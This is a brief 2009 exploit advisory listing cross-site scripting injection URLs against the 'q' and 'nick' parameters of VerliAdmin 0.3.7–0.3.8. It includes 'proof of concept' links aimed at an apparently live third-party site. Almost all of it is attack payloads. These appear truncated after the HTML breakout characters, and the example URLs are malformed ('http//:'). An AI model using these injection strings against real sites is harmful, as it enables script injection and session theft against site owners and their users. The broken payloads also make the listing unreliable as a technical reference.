VerliAdmin- v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities
http://bohyn.czechweb.cz
- 5-05-2009
- Methodman - http://nemesis.te-home.net
-Example:
http//:verliadmin.com/index.php?q=bantest&nick=">
http//:verliadmin.com/index.php?nick="'/>
http//:verliadmin.com/index.php?q="'/>
http//:verliadmin.com/index.php?"'/>
-Proof of Concept:
http://alfa.hub.lv/alfa/index.php?q=bantest&nick=">
http://alfa.hub.lv/alfa/index.php?nick="'/>
http://alfa.hub.lv/alfa/index.php?q="'/>
http://alfa.hub.lv/alfa/index.php?"'/>
/teamelite 2009